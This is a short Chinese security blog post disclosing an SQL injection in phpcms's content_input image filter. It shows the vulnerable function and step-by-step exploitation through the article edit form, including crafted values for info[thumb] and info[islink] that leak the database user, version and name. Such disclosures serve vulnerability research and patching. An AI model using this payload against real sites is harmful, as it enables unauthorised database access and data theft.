phpcms最新版本SQL注入一枚

没穿底裤 2020年1月1日03:45:55评论451 views字数 415阅读1分23秒阅读模式
摘要

漏洞文件[php]function image($field, $value) {$value = remove_xss(str_replace(array("'",'"','(',')'),'',$value));


漏洞作者: 路人甲

漏洞文件

/caches/caches_model/caches_data/content_input.class.php

[php]

function image($field, $value) {

$value = remove_xss(str_replace(array("'",'"','(',')'),'',$value));

return trim($value);

}

[/php]

过滤不单引号,由于GPC的关系,因此会留下 / ,造成注入

漏洞利用证明:

开启投稿

1.首先随便提交一个文章,保存 点编辑,如图

phpcms最新版本SQL注入一枚

 

2.进入编辑后,直接点击保存 ,然后抓包修改如下

phpcms最新版本SQL注入一枚

修改info[thumb]为:http://site'

修改info[islink]为:

,description=(select concat(user(),0x7c,version(),0x7c,database())) -- s

最后确认。

再次进入编辑页面,可以看见注入的结果,如图:

phpcms最新版本SQL注入一枚

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日03:45:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpcms最新版本SQL注入一枚http://cn-sec.com/archives/75820.html

发表评论

匿名网友 填写信息